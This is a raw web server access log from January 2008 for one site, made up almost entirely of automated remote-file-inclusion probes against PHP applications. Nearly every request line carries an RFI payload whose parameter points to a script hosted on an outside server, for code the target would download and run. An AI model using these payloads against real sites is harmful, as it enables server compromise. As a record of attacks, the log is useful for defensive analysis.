124.0.73.2 - - [12/Jan/2008:04:16:21 -0800] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
122.153.194.3 - - [12/Jan/2008:04:17:10 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
122.153.194.3 - - [12/Jan/2008:04:17:34 -0800] "GET /logs/access_070812.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
122.153.194.3 - - [12/Jan/2008:04:17:34 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
122.153.194.3 - - [12/Jan/2008:04:17:34 -0800] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
211.230.148.86 - - [12/Jan/2008:04:17:42 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 304 "-" "libwww-perl/5.805" "www.projectpr.com"
66.98.246.23 - - [12/Jan/2008:04:19:19 -0800] "GET /logs/access_070712.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 327 "-" "libwww-perl/5.65" "www.projectpr.com"
89.255.3.207 - - [12/Jan/2008:04:20:34 -0800] "GET /logs/access_070712.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
222.234.1.78 - - [12/Jan/2008:04:21:15 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
125.245.27.141 - - [12/Jan/2008:04:22:28 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:22:30 -0800] "GET /logs/access.log/mcf.php?content=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:22:31 -0800] "GET /mcf.php?content=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:22:31 -0800] "GET /logs/mcf.php?content=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
143.248.135.48 - - [12/Jan/2008:04:23:13 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Jan/2008:04:24:29 -0800] "GET //skin/zero_vote/error.php?dir=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
213.189.224.45 - - [12/Jan/2008:04:24:30 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.808" "www.projectpr.com"
125.245.27.141 - - [12/Jan/2008:04:24:42 -0800] "GET /logs/access_070812.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
82.165.238.111 - - [12/Jan/2008:04:24:43 -0800] "GET /logs/access_070812.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 327 "-" "libwww-perl/5.79" "www.projectpr.com"
82.165.238.111 - - [12/Jan/2008:04:24:43 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
82.165.238.111 - - [12/Jan/2008:04:24:43 -0800] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
125.245.27.141 - - [12/Jan/2008:04:24:46 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 304 "-" "libwww-perl/5.805" "www.projectpr.com"
125.245.27.141 - - [12/Jan/2008:04:24:51 -0800] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 309 "-" "libwww-perl/5.805" "www.projectpr.com"
124.0.73.2 - - [12/Jan/2008:04:24:54 -0800] "GET /logs/access_070712.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:25:55 -0800] "GET /logs/access_070812.log//modules/vwar/admin/admin.php?vwar_root=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:25:55 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:25:55 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:26:17 -0800] "GET /logs/access.log/mcf.php?content=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:26:17 -0800] "GET /mcf.php?content=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:26:17 -0800] "GET /logs/mcf.php?content=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.117.166.233 - - [12/Jan/2008:04:26:59 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.landmarkvastgoed.nl/language/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
216.117.166.233 - - [12/Jan/2008:04:27:02 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.landmarkvastgoed.nl/language/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
216.117.166.233 - - [12/Jan/2008:04:27:03 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.landmarkvastgoed.nl/language/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
122.153.194.3 - - [12/Jan/2008:04:28:15 -0800] "GET /logs/access_070712.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.224.45 - - [12/Jan/2008:04:30:24 -0800] "GET /logs/access.log/mcf.php?content=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
213.189.224.45 - - [12/Jan/2008:04:30:24 -0800] "GET /mcf.php?content=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
213.189.224.45 - - [12/Jan/2008:04:30:25 -0800] "GET /logs/mcf.php?content=http://www.gruppomulti.ch/documents/coges.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.74.171.125 - - [12/Jan/2008:04:32:56 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.74.171.125 - - [12/Jan/2008:04:32:56 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.74.171.125 - - [12/Jan/2008:04:32:56 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.74.171.125 - - [12/Jan/2008:04:32:59 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.74.171.125 - - [12/Jan/2008:04:32:59 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.74.171.125 - - [12/Jan/2008:04:32:59 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.74.171.125 - - [12/Jan/2008:04:34:52 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.74.171.125 - - [12/Jan/2008:04:34:53 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.74.171.125 - - [12/Jan/2008:04:35:56 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.74.171.125 - - [12/Jan/2008:04:35:56 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.74.171.125 - - [12/Jan/2008:04:35:56 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.74.171.125 - - [12/Jan/2008:04:35:59 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.74.171.125 - - [12/Jan/2008:04:35:59 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
208.74.171.125 - - [12/Jan/2008:04:35:59 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://www.events.rustygrape.com//includes/cmd31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.6.8.120 - - [12/Jan/2008:04:36:28 -0800] "GET /logs/access_070812.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.53.147.60 - - [12/Jan/2008:04:36:37 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.projectpr.com"
208.53.147.60 - - [12/Jan/2008:04:36:37 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.projectpr.com"
217.110.144.106 - - [12/Jan/2008:04:38:49 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:04:38:53 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:04:38:53 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:04:38:54 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:38:59 -0800] "GET /logs/access_071112.log/mcf.php?content=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.808" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:04:40:30 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:04:40:30 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:04:40:31 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:04:41:37 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:04:41:37 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:41:53 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:41:53 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:41:53 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
193.142.215.14 - - [12/Jan/2008:04:42:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
193.142.215.14 - - [12/Jan/2008:04:42:34 -0800] "GET //skin/zero_vote/error.php?dir=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
222.234.1.78 - - [12/Jan/2008:04:42:37 -0800] "GET /logs/access.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 320 "-" "libwww-perl/5.805" "www.projectpr.com"
211.230.148.86 - - [12/Jan/2008:04:42:37 -0800] "GET /logs/access.log/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:04:43:11 -0800] "GET //skin/zero_vote/error.php?dir=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:04:43:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:04:43:48 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://www.eavi.no/script/djd.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:04:43:48 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://www.eavi.no/script/djd.jpg??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805" "www.projectpr.com"
218.188.2.141 - - [12/Jan/2008:04:43:50 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://www.eavi.no/script/djd.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:04:44:12 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:04:44:22 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:04:44:23 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:04:44:23 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:04:44:24 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:04:44:24 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:04:44:25 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:04:44:27 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:04:44:33 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:04:44:33 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:04:44:34 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.65" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:44:36 -0800] "GET /logs/access_070912.log/scanhttp://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:44:36 -0800] "GET /scanhttp://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:44:37 -0800] "GET /logs/scanhttp://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:44:37 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 322 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:44:37 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:04:44:37 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:04:44:39 -0800] "GET /logs/access_070912.log///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:04:44:39 -0800] "GET ///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:04:44:39 -0800] "GET /logs///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
74.6.20.155 - - [12/Jan/2008:04:45:02 -0800] "GET /clipart/images/sidebars/?S=A HTTP/1.0" 200 699 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:46:10 -0800] "GET /logs/access_070912.log/scanhttp://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:46:10 -0800] "GET /scanhttp://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:46:11 -0800] "GET /logs/scanhttp://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:04:47:13 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:04:47:13 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:04:47:13 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:47:14 -0800] "GET /logs/access_070912.log/scanhttp://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 309 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:47:14 -0800] "GET /logs/access_070912.log//login.php?dir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:47:14 -0800] "GET /scanhttp://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 286 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:47:14 -0800] "GET //login.php?dir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:47:14 -0800] "GET /logs//login.php?dir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:47:19 -0800] "GET /logs/scanhttp://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:04:47:41 -0800] "GET /logs/access_071012.log///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:48:10 -0800] "GET /logs/access_070912.log//login.php?dir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:48:10 -0800] "GET //login.php?dir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:48:11 -0800] "GET /logs//login.php?dir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:48:29 -0800] "GET /logs/access_070912.log//login.php?dir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:48:29 -0800] "GET //login.php?dir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.193.248.204 - - [12/Jan/2008:04:48:30 -0800] "GET /logs//login.php?dir=http://216.126.65.86/includes/1d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
80.168.55.27 - - [12/Jan/2008:04:49:20 -0800] "GET /index2.php?x=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.200.83.90 - - [12/Jan/2008:04:49:27 -0800] "GET //include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
74.200.83.90 - - [12/Jan/2008:04:49:27 -0800] "GET /logs//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
